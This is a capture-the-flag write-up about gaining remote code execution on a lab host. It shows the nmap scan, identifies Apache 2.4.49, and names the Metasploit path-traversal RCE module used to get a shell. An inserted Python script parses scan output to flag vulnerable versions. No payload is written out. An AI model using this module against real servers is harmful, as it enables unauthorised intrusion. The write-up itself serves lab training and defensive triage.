Description

Obtain RCE on the host calculator.edu.stf (10.124.1.232) by exploiting a business logic vulnerability.

To get the flag, run the script /home/rceflag.

<aside> 💡

Again, this might be another UNINTENDED solution, but we still achieved RCE and obtained the flag. The challenge hints at a business logic vulnerability, but I discovered other critical vulnerabilities during early reconnaissance and proceeded with those instead.

</aside>

As usual, the first thing I do is scan the target with nmap:

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 6c:ae:40:fe:62:06:3e:08:f4:96:f1:7d:22:63:ac:dd (RSA)
|   256 8a:be:5e:69:a5:62:26:4b:60:cb:45:c4:bd:7a:47:c5 (ECDSA)
|_  256 93:50:2d:84:88:cc:50:99:6d:be:c0:05:50:08:c2:eb (ED25519)
80/tcp   open  http    Apache httpd 2.4.49 ((Unix))
|_http-server-header: Apache/2.4.49 (Unix)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Apache2 Debian Default Page: It works
8080/tcp open  http    Golang net/http server
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Accept-Ranges: bytes
|     Content-Length: 619
|     Content-Type: text/html; charset=utf-8
|     Last-Modified: Mon, 19 Feb 2024 10:24:56 GMT
|     Date: Sun, 07 Sep 2025 17:15:45 GMT
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <meta charset="UTF-8" />
|     </head>
|     <body>
|     <div>
|     <p>Request for nuclear power plant capacity for legal entities</p>
|     <form method="POST" action="/">
|     <label for="temp">Specify the required amount of MegaWatts</label>
|     <input name="temp" type="number" min="0" max="100" id="temp"/>
|     <input type="submit" value="Test">
|     </form>
|     </div>
|     </body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Date: Sun, 07 Sep 2025 17:15:45 GMT
|     Content-Length: 40
|     Content-Type: text/plain; charset=utf-8
|     Only GET and POST methods are supported.
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|_    Request
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at <https://nmap.org/cgi-bin/submit.cgi?new-service> :
SF-Port8080-TCP:V=7.95%I=7%D=9/7%Time=68BDBDC0%P=x86_64-pc-linux-gnu%r(Get
SF:Request,324,"HTTP/1\.0\x20200\x20OK\r\nAccept-Ranges:\x20bytes\r\nConte
SF:nt-Length:\x20619\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nLa
SF:st-Modified:\x20Mon,\x2019\x20Feb\x202024\x2010:24:56\x20GMT\r\nDate:\x
SF:20Sun,\x2007\x20Sep\x202025\x2017:15:45\x20GMT\r\n\r\n<!DOCTYPE\x20html
SF:>\n<html>\n\x20\x20\x20\x20\x20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20charset=\"UTF-8\"\
SF:x20/>\n\x20\x20\x20\x20\x20\x20\x20\x20</head>\n\x20\x20\x20\x20\x20\x2
SF:0\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20<div>\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<p>Request\x20for\x20nuclear\
SF:x20power\x20plant\x20capacity\x20for\x20legal\x20entities</p>\n\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20<form\x20method=\"POST\"\x20action=\"/\">\n\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<label\x20for=\"temp\">Sp
SF:ecify\x20the\x20required\x20amount\x20of\x20MegaWatts</label>\n\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<input\x20name=\"temp\
SF:"\x20type=\"number\"\x20min=\"0\"\x20max=\"100\"\x20id=\"temp\"/>\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<input\x20type=\"s
SF:ubmit\"\x20value=\"Test\">\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20</form>\n\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20</div>\n\x20\x20
SF:\x20\x20\x20\x20\x20\x20</body>\n</html>\n")%r(HTTPOptions,9D,"HTTP/1\.
SF:0\x20200\x20OK\r\nDate:\x20Sun,\x2007\x20Sep\x202025\x2017:15:45\x20GMT
SF:\r\nContent-Length:\x2040\r\nContent-Type:\x20text/plain;\x20charset=ut
SF:f-8\r\n\r\nOnly\x20GET\x20and\x20POST\x20methods\x20are\x20supported\."
SF:)%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:
SF:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20
SF:Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 42.94 seconds

And surprisingly, the output already reveals a critical vulnerability: the web server on port 80 identifies itself as Apache httpd 2.4.49 (Unix), a version with a well-known public exploit.

Check out:

Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
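The version check that the scan makes possible can be automated. The following Python script is added here as an example and is not part of the original writeup: it parses the port lines of plain nmap -sV output (the three lines from the scan above are embedded as a constructed sample) and flags any service whose version falls inside a known-affected range. The `KNOWN_AFFECTED` table, the `Service` type and the helper names are assumptions of this example; its single entry uses only the version range and description that the Metasploit search on this page reports (Apache 2.4.49/2.4.50).

```python
import re
from typing import List, NamedTuple, Optional, Tuple

# Constructed sample: the three port lines from the nmap -sV output above,
# without the script (| ...) lines, which the parser ignores anyway.
SAMPLE_NMAP_OUTPUT = """\
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.49 ((Unix))
8080/tcp open  http    Golang net/http server
"""

Version = Tuple[int, ...]


class Service(NamedTuple):
    port: int
    proto: str
    name: str                  # nmap's SERVICE column
    product: str               # banner text before the version number
    version: Optional[Version]  # None when the banner carries no version


# Hypothetical affected-version table: (product prefix, lowest affected,
# highest affected, label). The one entry is the range and description the
# Metasploit module on this page reports; a real table would be much longer.
KNOWN_AFFECTED = [
    ("Apache httpd", (2, 4, 49), (2, 4, 50), "Apache 2.4.49/2.4.50 Traversal RCE"),
]

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s+(.*)$")
VERSION_RE = re.compile(r"\d+(?:\.\d+)+")


def parse_version(banner: str) -> Optional[Version]:
    """Return the first dotted number in a banner as an int tuple, e.g. (2, 4, 49)."""
    m = VERSION_RE.search(banner)
    return tuple(int(x) for x in m.group(0).split(".")) if m else None


def parse_nmap(text: str) -> List[Service]:
    """Parse the 'PORT STATE SERVICE VERSION' table of plain nmap -sV output."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue  # header, NSE script output (| ...) and blank lines
        port, proto, name, banner = m.groups()
        v = VERSION_RE.search(banner)
        product = banner[: v.start()].strip() if v else banner.strip()
        services.append(Service(int(port), proto, name, product, parse_version(banner)))
    return services


def triage(services: List[Service]) -> List[Tuple[int, str]]:
    """Return (port, label) for every service whose version lies in an affected range."""
    findings = []
    for svc in services:
        if svc.version is None:
            continue  # no version in the banner: the scan alone cannot decide
        for prefix, lo, hi, label in KNOWN_AFFECTED:
            # Tuples compare element-wise, so (2, 4, 49) <= (2, 4, 50) holds.
            if svc.product.startswith(prefix) and lo <= svc.version <= hi:
                findings.append((svc.port, label))
    return findings


if __name__ == "__main__":
    for port, label in triage(parse_nmap(SAMPLE_NMAP_OUTPUT)):
        print(f"port {port}: {label}")
```

A banner match is a lead, not a confirmation: distribution builds can backport a fix without changing the advertised version, and a server can be configured to hide or alter its version string, so a hit should be confirmed with a dedicated check (the auxiliary scanner's CHECK_TRAVERSAL action shown later on this page is one) before it is acted on or reported. Run over periodic scans of one's own estate, the same parser turns this manual observation into a recurring inventory check.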

Without wasting time, I searched for the exploit module in Metasploit:

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo msfconsole 
Metasploit tip: Use the 'capture' plugin to start multiple 
authentication-capturing and poisoning services
                                                  
                                   ___          ____
                               ,-""   `.      < HONK >
                             ,'  _   e )`-._ /  ----
                            /  ,' `-._<.===-'
                           /  /
                          /  ;
              _          /   ;
 (`._    _.-"" ""--..__,'    |
 <_  `-""                     \
  <`-                          :
   (__   <__.                  ;
     `-.   '-.__.      _.'    /
        \      `-.__,-'    _,'
         `._    ,    /__,-'
            ""._\__,'< <____
                 | |  `----.`.
                 | |        \ `.
                 ; |___      \-``
                 \   --<
                  `.`.<
                    `-'

       =[ metasploit v6.4.84-dev                                ]
+ -- --=[ 2,547 exploits - 1,309 auxiliary - 1,683 payloads     ]
+ -- --=[ 432 post - 49 encoders - 13 nops - 9 evasion          ]

Metasploit Documentation: <https://docs.metasploit.com/>
The Metasploit Framework is a Rapid7 Open Source Project

msf > search Apache httpd 2.4.49

Matching Modules
================

   #  Name                                          Disclosure Date  Rank       Check  Description
   -  ----                                          ---------------  ----       -----  -----------
   0  exploit/multi/http/apache_normalize_path_rce  2021-05-10       excellent  Yes    Apache 2.4.49/2.4.50 Traversal RCE
   1    \_ target: Automatic (Dropper)              .                .          .      .
   2    \_ target: Unix Command (In-Memory)         .                .          .      .
   3  auxiliary/scanner/http/apache_normalize_path  2021-05-10       normal     No     Apache 2.4.49/2.4.50 Traversal RCE scanner
   4    \\_ action: CHECK_RCE                        .                .          .      Check for RCE (if mod_cgi is enabled).
   5    \\_ action: CHECK_TRAVERSAL                  .                .          .      Check for vulnerability.
   6    \\_ action: READ_FILE                        .                .          .      Read file on the remote server.

Interact with a module by name or index. For example info 6, use 6 or use auxiliary/scanner/http/apache_normalize_path
After interacting with a module you can manually set a ACTION with set ACTION 'READ_FILE'

And yes, the exploit is available in Metasploit.

After setting the exploit options, we instantly popped a shell. Running /home/rceflag then gives us the flag.